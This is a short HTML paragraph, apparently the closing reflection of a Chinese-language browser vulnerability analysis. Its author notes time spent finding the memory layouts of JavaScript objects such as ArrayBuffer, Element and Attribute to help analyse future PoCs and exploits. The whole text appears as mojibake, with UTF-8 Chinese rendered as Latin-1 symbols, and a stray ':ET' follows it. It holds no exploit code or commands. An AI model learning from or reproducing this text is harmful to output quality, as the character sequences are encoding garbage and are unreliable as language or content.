<p>æ­¤æ¬¡åˆ†æå¤§éƒ¨åˆ†çš„æ—¶é—´èŠ±åœ¨å¯¹å„ç§JSå¯¹è±¡å†…å­˜ç»“æ„çš„å¯»æ‰¾ä¸Šï¼Œç»è¿‡æŸ¥æ‰¾èµ„æ–™å’Œæ‰‹åŠ¨è°ƒè¯•ï¼Œå¯¹äºArrayBufferã€Elementã€Attributeç­‰ç»“æ„æœ‰äº†æ·±å…¥çš„äº†è§£ï¼Œä¸‹æ¬¡åœ¨åˆ†ææœ‰è¿™äº›å¯¹è±¡å‚ä¸çš„POCå’ŒEXPæ—¶å¯ä»¥å¿«é€Ÿçš„å®šä½åˆ°è¿™äº›å¯¹è±¡çš„å†…å­˜ï¼ŒåŒæ—¶ä¹Ÿæ‰¾åˆ°äº†å¯¹è±¡å†…ç½®å‡½æ•°çš„è°ƒç”¨ä½ç½®ï¼Œå¯ä»¥å¿«é€Ÿå®šä½ä»£ç æ‰§è¡Œä½ç½®å’Œæ‰§è¡Œç»“æœã€‚</p>
:ET